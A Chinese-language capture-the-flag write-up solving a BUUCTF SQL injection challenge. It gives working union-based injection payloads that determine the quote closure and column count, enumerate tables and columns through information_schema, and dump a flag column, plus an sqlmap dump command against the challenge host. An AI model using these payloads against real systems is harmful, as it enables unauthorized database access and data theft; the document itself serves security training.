一、题目简介:
题目来源:BUUCTF网址
题目介绍如图:获取flag值。
二、解题思路:
首先看到题目主页面有一段文字,貌似没有什么作用,我们先使用HackBar导入URL。
我们发现?id=1,可知这是一个很基础的SQL注入题目,我们首先要进行注入类型的判断,判断本次SQL注入是字符型注入还是数字型注入。
我们首先判断是否位数字型注入。
?id=1 and 1=2
假设注入就是数字型注入,那么此时后端语句变成了 select * from users where id = 1 and 1=2;那么页面应该显示报错,可是提交后发现,页面保持不变,由此可以断定,本次注入不是数字型注入。
既然我们已经判断出其不是数字型注入,那么就是字符型注入,我们就需要判断其闭合类型是什么。首先尝试单引号闭合。
?id=1' and 1=2--+
假设闭合方式就是单引号,那么后端语句即为:
select * from users where id='1' and 1=2 --+';
那么页面同样应该显示报错信息,我们进行提交看看:
果然页面信息不显示了,这就正好说明本次字符型注入的闭合方式为 单引号闭合。
清楚闭合方式之后,我们就要判断字段数的数量--通过order by number来解决。
?id=1' order by + 字段数 --+
当我们判断字段数为3时:
当我们判断字段数为4时:
我们发现字段数为3时显示正常,而为4时页面发生了变化,说明字段数为3。然后进行查询回显位,只有找到回显位,才能让flag在回显位上被我们看到。
?id=-1' union select 1,2,3--+
回显位如图所示:
发现回显位之后,进行爆表就可以了。
首先查询数据库中的表名:
union select 1,database(),group_concat(table_name)from information_schema.tables where table_schema=database()--+
我们发现数据库中存在两张表,其中一张表叫做fl4g,我们大胆猜想flag就在表fl4g中。
于是我们就查询表fl4g中的列名。
union select 1,database(),group_concat(column_name)from information_schema.columns where table_name='fl4g'--+
我们发现一个名叫作 fllllag的列,flag值很有可能就在fllllag中,我们查询fllllag中的内容。
union select 1,database(),group_concat(fllllag)from fl4g--+
我们看到成功获取了flag的值,提交---通过。
sqlmap解法:
我们也可以使用工具 sqlmap来解决这道题目。
sqlmap -u http://5e77ef3c-a640-4be4-ad44-c836aa77ead7.node5.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C fllllag --dump --batch
